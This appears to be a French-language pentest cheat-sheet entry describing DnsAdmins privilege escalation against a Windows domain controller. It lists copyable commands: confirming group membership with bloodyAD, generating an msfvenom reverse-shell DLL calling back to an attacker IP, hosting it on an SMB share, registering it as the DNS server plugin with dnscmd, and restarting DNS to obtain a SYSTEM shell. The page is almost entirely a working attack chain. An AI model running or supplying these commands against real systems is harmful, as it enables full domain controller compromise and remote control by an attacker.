Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'DnsAdmins'Description: Confirmer l'appartenance au groupe DnsAdmins avant l'exploitation.
Windows Privilege Escalation
Charger une DLL arbitraire dans le service DNS pour obtenir SYSTEM sur le DC.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'DnsAdmins'Description: Confirmer l'appartenance au groupe DnsAdmins avant l'exploitation.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$PORT -f dll -o evil.dllDescription: Créer la DLL malveillante qui sera chargée par le service DNS en tant que SYSTEM.
impacket-smbserver share $(pwd) -smb2supportDescription: Héberger la DLL via un partage SMB : le service DNS ira la chercher au démarrage.
dnscmd $DC /config /serverlevelplugindll \\$ATTACKER_IP\share\evil.dllDescription: Configurer la DLL plugin dans le service DNS : persistera jusqu'au prochain restart.
nxc smb $DC -u $USER -p $PASS -x 'sc stop dns && sc start dns'Description: Redémarrer DNS pour déclencher le chargement de la DLL : shell SYSTEM attendu.